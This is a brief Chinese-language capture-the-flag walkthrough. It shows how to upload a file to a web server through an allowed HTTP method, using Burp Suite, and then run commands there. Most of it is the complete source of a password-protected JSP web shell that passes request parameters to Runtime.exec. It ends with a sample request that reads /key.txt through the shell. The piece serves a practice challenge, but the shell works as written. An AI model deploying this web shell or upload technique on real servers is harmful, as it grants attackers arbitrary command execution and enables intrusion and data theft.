打开题目的网址,burpsuite进行抓包,右键发送到Repeater
利用OPTIONS查看支持的方法
构造有效载荷,实现任意命令执行:
代码如下:
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("
"+excuteCmd(request.getParameter("cmd"))+"");}else{out.println(":-)");}%>
点击进入按钮,创建一句话木马文件,创建成功后,访问相应文件,执行任意命令:
http://ip地址/1.jsp?cmd=cat /key.txt&pwd=023
网友评论